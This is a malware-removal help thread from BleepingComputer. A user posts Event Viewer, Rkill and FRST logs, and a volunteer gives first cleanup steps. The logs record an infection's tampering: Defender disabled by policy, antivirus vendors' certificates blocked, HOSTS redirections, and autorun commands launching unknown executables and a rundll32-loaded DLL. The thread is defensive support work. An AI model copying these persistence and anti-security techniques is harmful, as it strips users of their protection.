Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40660
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40660
Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810
Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810
Microsoft Visual C++ 2017 x64 Additional Runtime - 14.12.25810
Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.12.25810
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.12.25810
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.12.25810
Microsoft Visual Studio 2010 Tools for Office Runtime (x64)
Microsoft Visual Studio 2017
NVIDIA PhysX
Realtek Card Reader
Realtek High Definition Audio Driver
RevServicesX
SafeFinder
Steam
SUPERAntiSpyware
Synaptics Pointing Device Driver
System Healer
System Table
vs_filehandler_x86
WhatsApp
Windows 10 Update Assistant
WinRAR 5.40 (64-bit)
.
==== Event Viewer Messages From Past Week ========
.
6/8/2018 9:46:32 PM, Error: Microsoft-Windows-DistributedCOM [10016]  - The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID  {D63B10C5-BB46-4990-A94F-E40B9D520160}  and APPID  {9CA88EE3-ACB7-47C8-AFC4-AB702511C276}  to the user ALEX-PC\Craciun SID (S-1-5-21-3764278317-3264620232-1554668131-1000) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
6/8/2018 9:42:34 PM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.Windows.ShellExperienceHost_10.0.17134.1_neutral_neutral_cw5n1h2txyewy!App as Unavailable/Unavailable. The error: "2" Happened while starting this command: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
6/8/2018 9:37:10 PM, Error: Microsoft-Windows-DistributedCOM [10016]  - The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID  {8BC3F05E-D86B-11D0-A075-00C04FB68820}  and APPID  {8BC3F05E-D86B-11D0-A075-00C04FB68820}  to the user ALEX-PC\Craciun SID (S-1-5-21-3764278317-3264620232-1554668131-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.Windows.ContentDeliveryManager_10.0.17134.1_neutral_neutral_cw5n1h2txyewy SID (S-1-15-2-350187224-1905355452-1037786396-3028148496-2624191407-3283318427-1255436723). This security permission can be modified using the Component Services administrative tool.
6/8/2018 9:14:07 AM, Error: Service Control Manager [7034]  - The Windows Installer service terminated unexpectedly.  It has done this 1 time(s).
6/8/2018 3:42:29 PM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI as Unavailable/Unavailable. The error: "2" Happened while starting this command: "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
6/8/2018 3:41:23 PM, Error: Service Control Manager [7000]  - The Disc Soft Pro Bus Service service failed to start due to the following error:  The system cannot find the file specified.
6/8/2018 3:41:23 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "2" attempting to start the service Disc Soft Pro Bus Service with arguments "Unavailable" in order to run the server: {E9526F9B-B449-4171-810F-E710946CA1FA}
6/8/2018 3:39:49 PM, Error: Microsoft-Windows-DistributedCOM [10016]  - The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID  {D63B10C5-BB46-4990-A94F-E40B9D520160}  and APPID  {9CA88EE3-ACB7-47C8-AFC4-AB702511C276}  to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
6/8/2018 3:39:49 PM, Error: Microsoft-Windows-DistributedCOM [10016]  - The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID  {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}  and APPID  {4839DDB7-58C2-48F5-8283-E1D1807D0D7D}  to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
6/8/2018 11:00:40 AM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: microsoft.windowscommunicationsapps_17.9226.21705.0_x64__8wekyb3d8bbwe!microsoft.windowslive.calendar.AppXwkn9j84yh1kvnt49k5r8h6y1ecsv09hs.mca as Unavailable/Unavailable. The error: "298" Happened while starting this command: "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.9226.21705.0_x64__8wekyb3d8bbwe\HxTsr.exe" -ServerName:Hx.IPC.Server
6/8/2018 11:00:00 AM, Error: Service Control Manager [7031]  - The Windows Installer service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
6/8/2018 10:48:14 AM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.Windows.ShellExperienceHost_10.0.17134.1_neutral_neutral_cw5n1h2txyewy!App as Unavailable/Unavailable. The error: "5" Happened while starting this command: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
6/8/2018 10:47:47 AM, Error: Service Control Manager [7034]  - The saiyi technology limit service terminated unexpectedly.  It has done this 1 time(s).
6/8/2018 10:47:43 AM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI as Unavailable/Unavailable. The error: "5" Happened while starting this command: "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
6/8/2018 10:47:02 AM, Error: Service Control Manager [7000]  - The Google Update Service (gupdate) service failed to start due to the following error:  The system cannot find the file specified.
6/8/2018 10:46:50 AM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel as Unavailable/Unavailable. The error: "5" Happened while starting this command: "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
6/8/2018 10:44:54 AM, Error: Service Control Manager [7000]  - The Subair service failed to start due to the following error:  The system cannot find the file specified.
6/8/2018 10:44:54 AM, Error: Service Control Manager [7000]  - The Nettrans service failed to start due to the following error:  The system cannot find the file specified.
6/8/2018 10:44:54 AM, Error: Service Control Manager [7000]  - The MBAMService service failed to start due to the following error:  Access is denied.
6/8/2018 10:44:53 AM, Error: Service Control Manager [7000]  - The backlh service failed to start due to the following error:  The system cannot find the file specified.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The WlanSvc service depends on the Wcmsvc service which failed to start because of the following error:  The dependency service or group failed to start.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The WinHttpAutoProxySvc service depends on the Dhcp service which failed to start because of the following error:  The dependency service or group failed to start.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The Wcmsvc service depends on the nsi service which failed to start because of the following error:  The dependency service or group failed to start.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The nsi service depends on the nsiproxy service which failed to start because of the following error:  A device attached to the system is not functioning.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The NlaSvc service depends on the Dhcp service which failed to start because of the following error:  The dependency service or group failed to start.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The mrxsmb20 service depends on the mrxsmb service which failed to start because of the following error:  The dependency service or group failed to start.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The mrxsmb service depends on the rdbss service which failed to start because of the following error:  A device attached to the system is not functioning.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The LanmanWorkstation service depends on the nsi service which failed to start because of the following error:  The dependency service or group failed to start.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The iphlpsvc service depends on the WinHttpAutoProxySvc service which failed to start because of the following error:  The dependency service or group failed to start.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The Dnscache service depends on the tdx service which failed to start because of the following error:  A device attached to the system is not functioning.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The Dhcp service depends on the AFD service which failed to start because of the following error:  A device attached to the system is not functioning.
6/8/2018 10:31:27 AM, Error: Microsoft-Windows-DistributedCOM [10016]  - The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID  {C2F03A33-21F5-47FA-B4BB-156362A2F239}  and APPID  {316CDED5-E4AE-4B15-9113-7055D84DCC97}  to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
6/8/2018 10:00:58 PM, Error: Service Control Manager [7000]  - The Windows Defender Antivirus Service service failed to start due to the following error:  Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
6/7/2018 8:37:40 PM, Error: Service Control Manager [7034]  - The Windows Installer service terminated unexpectedly.  It has done this 3 time(s).
6/7/2018 8:28:57 PM, Error: Service Control Manager [7031]  - The Windows Installer service terminated unexpectedly.  It has done this 2 time(s).  The following corrective action will be taken in 300000 milliseconds: Restart the service.
6/7/2018 8:17:06 PM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca as Unavailable/Unavailable. The error: "5" Happened while starting this command: "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
6/7/2018 8:05:51 AM, Error: Microsoft-Windows-HAL [13]  - The system watchdog timer was triggered.
6/7/2018 7:50:19 AM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca as Unavailable/Unavailable. The error: "2" Happened while starting this command: "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
6/6/2018 8:11:43 PM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: microsoft.windowscommunicationsapps_17.9226.21705.0_x64__8wekyb3d8bbwe!microsoft.windowslive.calendar.AppXwkn9j84yh1kvnt49k5r8h6y1ecsv09hs.mca as Unavailable/Unavailable. The error: "0" Happened while starting this command: "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.9226.21705.0_x64__8wekyb3d8bbwe\HxTsr.exe" -ServerName:Hx.IPC.Server
6/6/2018 8:01:50 PM, Error: Service Control Manager [7046]  - The following service has repeatedly stopped responding to service control requests: Connected User Experiences and Telemetry Contact the service vendor or the system administrator about whether to disable this service until the problem is identified. You may have to restart the computer in safe mode before you can disable the service.
6/6/2018 8:01:20 PM, Error: Service Control Manager [7011]  - A timeout (30000 milliseconds) was reached while waiting for a transaction response from the DiagTrack service.
6/5/2018 7:33:27 PM, Error: Service Control Manager [7031]  - The Windows Installer service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 300000 milliseconds: Restart the service.
6/5/2018 3:22:14 AM, Error: Service Control Manager [7000]  - The Microsoft Account Sign-in Assistant service failed to start due to the following error:  The service did not respond to the start or control request in a timely fashion.
6/5/2018 3:22:14 AM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1053" attempting to start the service WaaSMedicSvc with arguments "Unavailable" in order to run the server: {72566E27-1ABB-4EB3-B4F0-EB431CB1CB32}
6/5/2018 3:22:11 AM, Error: Service Control Manager [7009]  - A timeout was reached (30000 milliseconds) while waiting for the Microsoft Account Sign-in Assistant service to connect.
6/5/2018 3:22:10 AM, Error: Service Control Manager [7000]  - The Windows Update Medic Service service failed to start due to the following error:  The service did not respond to the start or control request in a timely fashion.
6/5/2018 3:22:08 AM, Error: Service Control Manager [7009]  - A timeout was reached (30000 milliseconds) while waiting for the Windows Update Medic Service service to connect.
6/5/2018 3:21:51 AM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.People_10.3.10452.0_x64__8wekyb3d8bbwe!x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppXv1pa150fssxfwf8qn0j65z3gp1qhwkcs.mca as Unavailable/Unavailable. The error: "0" Happened while starting this command: "C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca
6/5/2018 10:14:15 AM, Error: Service Control Manager [7022]  - The Update Orchestrator Service service hung on starting.
6/5/2018 10:06:06 AM, Error: Service Control Manager [7038]  - The msiserver service was unable to log on as NT AUTHORITY\SYSTEM with the currently configured password due to the following error:  The request is not supported. To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).
6/5/2018 10:06:06 AM, Error: Service Control Manager [7000]  - The Windows Installer service failed to start due to the following error:  The service did not start due to a logon failure.
6/4/2018 11:07:01 PM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.Windows.Photos_2018.18031.15820.0_x64__8wekyb3d8bbwe!App.AppXy9rh3t8m2jfpvhhxp6y2ksgeq77vymbq.mca as Unavailable/Unavailable. The error: "0" Happened while starting this command: "C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18031.15820.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe" -ServerName:App.AppXzst44mncqdg84v7sv6p7yznqwssy6f7f.mca
6/3/2018 8:43:00 AM, Error: Service Control Manager [7032]  - The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Installer service, but this action failed with the following error:  An instance of the service is already running.
.
==== End Of File ===========================
 
Oh, and this is what Rkill did: 

Rkill 2.9.1 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2018 BleepingComputer.com
More Information about Rkill can be found at this link:
 http://www.bleepingcomputer.com/forums/topic308364.html
 
Program started at: 06/08/2018 09:44:23 PM in x64 mode.
Windows Version: Windows 10 Pro 
 
Checking for Windows services to stop:
 
 * No malware services found to stop.
 
Checking for processes to terminate:
 
 * No malware processes found to kill.
 
Checking Registry for malware related settings:
 
 * No issues found in the Registry.
 
Resetting .EXE, .COM, & .BAT associations in the Windows Registry.
 
Performing miscellaneous checks:
 
 * Windows Defender Disabled
 
   [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
   "DisableAntiSpyware" = dword:00000001
 
Searching for Missing Digital Signatures: 
 
 * No issues found.
 
Checking HOSTS File: 
 
 * HOSTS file entries found: 
 
  127.0.0.1 cpm.paneladmin.pro
  127.0.0.1 publisher.hmdiadmingate.xyz
  127.0.0.1 hmdicrewtracksystem.xyz
  127.0.0.1 mydownloaddomain.com
  127.0.0.1 linkmate.space
  127.0.0.1 space1.adminpressure.space
  127.0.0.1 trackpressure.website
  127.0.0.1 doctorlink.space
  127.0.0.1 plugpackdownload.net
  127.0.0.1 texttotalk.org
  127.0.0.1 gambling577.xyz
  127.0.0.1 htagdownload.space
  127.0.0.1 mybcnmonetize.com
  127.0.0.1 360devtraking.website
  127.0.0.1 dscdn.pw
  127.0.0.1 bcnmonetize.go2affise.com
  127.0.0.1 beautifllink.xyz
  127.0.0.1 gf.tools.avast.com
  127.0.0.1 pair.ff.avast.com
  127.0.0.1 ipm-provider.ff.avast.com
 
  20 out of 257 HOSTS entries shown.
  Please review HOSTS file for further entries.
 
Program finished at: 06/08/2018 09:45:39 PM
Execution time: 0 hours(s), 1 minute(s), and 15 seconds(s)

Please, I have no idea what should I do. I don't understand all this letters and numbers.

Edited by Al1000, 10 June 2018 - 10:51 AM.
moved from Win 10 Support


BC AdBot (Login to Remove)

 


#2 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,372 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:11:43 AM

Posted 10 June 2018 - 05:53 PM

Greetings D3AtH and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that.

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met.
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far.

Please do this. If necessary, download the below program onto a USB device from a clean computer and transfer it over to the infected computer.

===================================================

Farbar Recovery Scan Tool (FRST)

--------------------
  • Download Farbar Recover Scan Tool for either 32 bit or 64 bit systems and save it to your Desktop. <<< Important
  • Right click on the icon and select Run as administrator
  • Click Yes to the disclaimer
  • Click Scan and allow the program to run
  • Click OK on the Scan complete screen, then OK on the Addition.txt pop up screen
  • 2 Notepad documents should now be open on your desktop.
  • Please copy and paste the contents of each report in separate reply windows
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • FRST results
  • Addition log

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"May you be richly rewarded by the Lord, the God of Israel, under whose wings you have come to take refuge."

#3 D3AtH

D3AtH
  • Topic Starter

  • Members
  • 3 posts
  • OFFLINE
  •  

Posted 11 June 2018 - 01:22 PM

You can call me Alex, and I would very much like to follow your steps in fixing my computer, because like you said you are experts and I don't want to make it worse.

Here is what you asked for:

FRST log:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 06.06.2018 01

Ran by Craciun (administrator) on ALEX-PC (11-06-2018 20:39:18)
Running from C:\Users\Craciun\Desktop
Loaded Profiles: Craciun (Available Profiles: Craciun)
Platform: Windows 10 Pro Version 1803 17134.48 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RTKAUDIOSERVICE64.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Realtek Semiconductor Corp.) C:\Windows\RtkBtManServ.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Microsoft Corporation) C:\Windows\System32\certutil.exe
Failed to access process -> chrome.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
() C:\Users\Craciun\AppData\Local\Temp\UCF4SO8U9O\UCF4.exe
() C:\Users\Craciun\AppData\Local\Temp\UCF4SO8U9O\T9XH.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
() C:\Users\Craciun\AppData\Local\Temp\UCF4SO8U9O\UCF4.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.9226.21705.0_x64__8wekyb3d8bbwe\HxTsr.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [SecurityHealth] => %ProgramFiles%\Windows Defender\MSASCuiL.exe
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [16781824 2017-05-10] (Realtek Semiconductor)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [316392 2018-05-11] (Adobe Systems, Incorporated)
HKLM\...\Run: [resolve_run] => C:\Program Files (x86)\Common Files\new.bat [184 2018-05-25] ()
HKLM\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\app.ex
HKLM\...\Run: [rundll32] => C:\Windows\system32\rundll32.exe "C:\Program Files\Sawmenger XP\Sawmenger XP.dll",elnXHi
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe Creative Cloud] => "C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
HKLM-x32\...\Run: [Lightshot] => C:\Program Files (x86)\Skillbrains\lightshot\Lightshot.exe [225944 2017-04-11] ()
HKLM-x32\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\app.ex
HKLM\...\RunOnce: [OMEWPRODUCT_] => C:\Program Files\Synaptics\PS1O1Z7IEGLDHYG\RJFnT9NCyn.exe [241664 2018-05-24] ()
HKLM\...\RunOnce: [yw1ci4cwik4] => C:\Program Files (x86)\trs\3084091.exe [670208 2018-05-23] ()
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
